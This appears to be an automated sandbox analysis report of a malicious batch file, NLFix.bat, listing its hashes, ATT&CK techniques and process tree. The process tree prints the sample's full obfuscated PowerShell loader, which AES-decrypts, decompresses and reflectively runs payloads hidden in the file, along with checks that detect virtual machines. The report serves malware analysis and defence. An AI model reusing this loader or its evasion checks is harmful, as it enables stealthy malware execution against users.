9d180dd0b5067c595c8c4c94e9a3098fb62ab8d0fe9ab451a32fcd4f6e3b6bdf

General

Target

NLFix.bat
Size

7.3MB
MD5

398c1f578d2d3a043041299f023603b8
SHA1

2416a7340c1bc2313d0c1a446e6bf6c70c673181
SHA256

9d180dd0b5067c595c8c4c94e9a3098fb62ab8d0fe9ab451a32fcd4f6e3b6bdf
SHA512

0a011639ae0c73c9ad335bccef27e8fecdb44c5a33bb136de2136801b9f319fa597ba2f6dd8a5f45b963703fdd26541938190630da0e45ec47a3571178ce6041
SSDEEP

49152:jfpqzii39LrgimomcMzBV6FJ6BFN1rBW7BIVGJ0FnyqcYkThNjQsItYBHIlDpPOQ:L

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2920	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2920	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2920	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 564 wrote to memory of 1452	564	cmd.exe	31
PID 564 wrote to memory of 1452	564	cmd.exe	31
PID 564 wrote to memory of 1452	564	cmd.exe	31
PID 564 wrote to memory of 1396	564	cmd.exe	32
PID 564 wrote to memory of 1396	564	cmd.exe	32
PID 564 wrote to memory of 1396	564	cmd.exe	32
PID 564 wrote to memory of 2784	564	cmd.exe	33
PID 564 wrote to memory of 2784	564	cmd.exe	33
PID 564 wrote to memory of 2784	564	cmd.exe	33
PID 564 wrote to memory of 2780	564	cmd.exe	34
PID 564 wrote to memory of 2780	564	cmd.exe	34
PID 564 wrote to memory of 2780	564	cmd.exe	34
PID 564 wrote to memory of 2912	564	cmd.exe	35
PID 564 wrote to memory of 2912	564	cmd.exe	35
PID 564 wrote to memory of 2912	564	cmd.exe	35
PID 564 wrote to memory of 2920	564	cmd.exe	36
PID 564 wrote to memory of 2920	564	cmd.exe	36
PID 564 wrote to memory of 2920	564	cmd.exe	36

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\NLFix.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:564
- C:\Windows\system32\fsutil.exe
  fsutil fsinfo drives
  2⤵
  PID:1452
- C:\Windows\system32\findstr.exe
  findstr /i /c:"DADY HARDDISK" /c:"QEMU HARDDISK" /c:"WDS100T2B0A"
  2⤵
  PID:1396
- C:\Windows\system32\fsutil.exe
  fsutil fsinfo drives
  2⤵
  PID:2784
- C:\Windows\system32\findstr.exe
  findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
  2⤵
  PID:2780
- C:\Windows\system32\cmd.exe
  cmd.exe /c echo function hTng($IsJP){ Invoke-Expression -Debug -Verbose -WarningAction Inquire '$sPuv=[BRSBRysBRtBRemBR.BRSeBRcBRuBRrBRiBRtBRy.BRCBRrBRyBRptBRoBRgBRrBRaBRpBRhBRyBR.ABReBRsBR]BR:BR:BRCrBReBRaBRteBR(BR);'.Replace('BR', ''); Invoke-Expression -WarningAction Inquire '$sPuv.MBvoBvdeBv=Bv[SBvyBvstBveBvmBv.BvSBveBvcuBvrBviBvtBvy.BvCBvrBvyBvpBvtBvoBvgBvraBvpBvhBvyBv.BvCBvipBvhBveBvrMBvoBvdeBv]:Bv:BvCBBvC;'.Replace('Bv', ''); Invoke-Expression -WarningAction Inquire '$sPuv.PkYakYddkYikYngkY=kY[SkYykYskYtkYekYmkY.SkYekYckYukYrikYtkYykY.kYCkYrkYykYpkYtokYgkYrkYakYpkYhkYy.kYPkYakYddkYikYngkYMokYdkYe]kY::kYPkYKkYCSkY7;'.Replace('kY', ''); Invoke-Expression -WarningAction Inquire '$sPuv.KGneGny=Gn[GnSyGnsGnteGnmGn.GnCGnoGnnGnveGnrGntGn]Gn::GnFGnrGnoGnmGnBGnaGnsGne6Gn4GnSGntGnrGniGnngGn("AGnHGnTkGnyGnERGnaGnOhGnvGnRGnPGnSGnKGn/6GncGnDGnAGnWBGn+GnDGnDGnnGnHGnrGn9GnfAGnLGneGnNGnqGncGnPxGnfGnYGn/rGnwGn=");'.Replace('Gn', ''); Invoke-Expression -Debug -WarningAction Inquire -InformationAction Ignore '$sPuv.IpgVpg=[pgSpgyspgtpgempg.pgCpgopgnpgvpgerpgtpg]pg:pg:FpgrpgopgmpgBpgapgspgepg64pgSpgtpgrpgipgnpgg("ipgKpgEzpgYpgg1pgVpghmpgYpgCpgEpg1pgVpg+NpgFpgLpgNpg7wpg=pg=pg");'.Replace('pg', ''); $VInP=$sPuv.CreateDecryptor(); $bwph=$VInP.TransformFinalBlock($IsJP, 0, $IsJP.Length); $VInP.Dispose(); $sPuv.Dispose(); $bwph;}function bInQ($IsJP){ Invoke-Expression -WarningAction Inquire -Debug -Verbose -InformationAction Ignore '$zkFu=NmOemOw-mOOmObjmOemOctmO mOSmOymOsmOtmOemmO.mOImOOmO.MmOemOmmOomOrmOymOSmOtmOremOamOm(,$IsJP);'.Replace('mO', ''); Invoke-Expression -Verbose -InformationAction Ignore -Debug -WarningAction Inquire '$MYrS=NmOemOw-mOOmObjmOemOctmO mOSmOymOsmOtmOemmO.mOImOOmO.MmOemOmmOomOrmOymOSmOtmOremOamOm;'.Replace('mO', ''); Invoke-Expression -InformationAction Ignore -Debug -WarningAction Inquire -Verbose '$YLrW=NQOeQOw-QOOQObjQOeQOctQO QOSQOyQOsQOtQOemQO.QOIQOOQO.CQOoQOmQOpQOrQOeQOsQOsQOioQOnQO.QOGQOZQOiQOpSQOtQOrQOeaQOmQO($zkFu, [QOIQOO.QOCQOomQOpQOreQOsQOsQOiQOoQOnQO.CQOoQOmQOpQOreQOsQOsQOiQOoQOnQOMQOoQOdeQO]QO:QO:QODQOeQOcoQOmQOpQOreQOsQOs);'.Replace('QO', ''); $YLrW.CopyTo($MYrS); $YLrW.Dispose(); $zkFu.Dispose(); $MYrS.Dispose(); $MYrS.ToArray();}function QhCd($IsJP,$kyeK){ Invoke-Expression -InformationAction Ignore -WarningAction Inquire '$VyZj=[kWSkWyskWtkWemkW.kWRekWfkWlkWekWckWtkWiokWnkW.kWAkWsskWekWmkWbkWlkWykW]kW:kW:LkWokWakWd([byte[]]$IsJP);'.Replace('kW', ''); Invoke-Expression -Debug -Verbose '$DDiX=$VyZj.EhpnhptrhpyhpPohpihpnthp;'.Replace('hp', ''); Invoke-Expression -Debug '$DDiX.TaITanvTaoTakeTa(Ta$nTauTalTalTa, $kyeK);'.Replace('Ta', '');}$UIKC = 'C:\Users\Admin\AppData\Local\Temp\NLFix.bat';$host.UI.RawUI.WindowTitle = $UIKC;$qAaR=[System.IO.File]::ReadAllText($UIKC).Split([Environment]::NewLine);foreach ($LPaK in $qAaR) { if ($LPaK.StartsWith('phDUy')) { $YxYD=$LPaK.Substring(5); break; }}$glGL=[string[]]$YxYD.Split('\');Invoke-Expression -Verbose -WarningAction Inquire -InformationAction Ignore '$Yok = bInQ (hTng ([aZCaZonaZvaZeraZtaZ]:aZ:aZFaZraZoaZmaZBaaZsaZeaZ6aZ4SaZtaZraZiaZnaZg($glGL[0].Replace("#", "/").Replace("@", "A"))));'.Replace('aZ', '');Invoke-Expression -Verbose -Debug '$Jcq = bInQ (hTng ([aZCaZonaZvaZeraZtaZ]:aZ:aZFaZraZoaZmaZBaaZsaZeaZ6aZ4SaZtaZraZiaZnaZg($glGL[1].Replace("#", "/").Replace("@", "A"))));'.Replace('aZ', '');Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Verbose -Debug '$Prj = bInQ (hTng ([aZCaZonaZvaZeraZtaZ]:aZ:aZFaZraZoaZmaZBaaZsaZeaZ6aZ4SaZtaZraZiaZnaZg($glGL[2].Replace("#", "/").Replace("@", "A"))));'.Replace('aZ', '');QhCd $Yok $null;QhCd $Jcq $null;QhCd $Prj (,[string[]] (''));
  2⤵
  PID:2912
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -WindowStyle Hidden
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2920

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2920-4-0x000007FEF651E000-0x000007FEF651F000-memory.dmp

Filesize
4KB

Download
memory/2920-5-0x000000001B310000-0x000000001B5F2000-memory.dmp

Filesize
2.9MB

Download
memory/2920-6-0x0000000002290000-0x0000000002298000-memory.dmp

Filesize
32KB

Download
memory/2920-7-0x000007FEF6260000-0x000007FEF6BFD000-memory.dmp

Filesize
9.6MB

Download
memory/2920-8-0x000007FEF6260000-0x000007FEF6BFD000-memory.dmp

Filesize
9.6MB

Download
memory/2920-9-0x000007FEF6260000-0x000007FEF6BFD000-memory.dmp

Filesize
9.6MB

Download
memory/2920-10-0x000007FEF6260000-0x000007FEF6BFD000-memory.dmp

Filesize
9.6MB

Download
memory/2920-11-0x000007FEF6260000-0x000007FEF6BFD000-memory.dmp

Filesize
9.6MB

Download
memory/2920-12-0x000007FEF651E000-0x000007FEF651F000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing